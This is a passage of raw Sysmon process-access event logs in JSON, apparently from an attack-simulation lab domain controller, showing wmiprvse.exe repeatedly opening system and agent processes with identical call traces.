07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B6C20200}","TargetProcessId":"2156","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5901,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nTargetProcessId: 3160\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","TargetProcessId":"3160","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5902,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5903,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5904,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5905,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010905D0400}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010905D0400}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5906,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5907,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|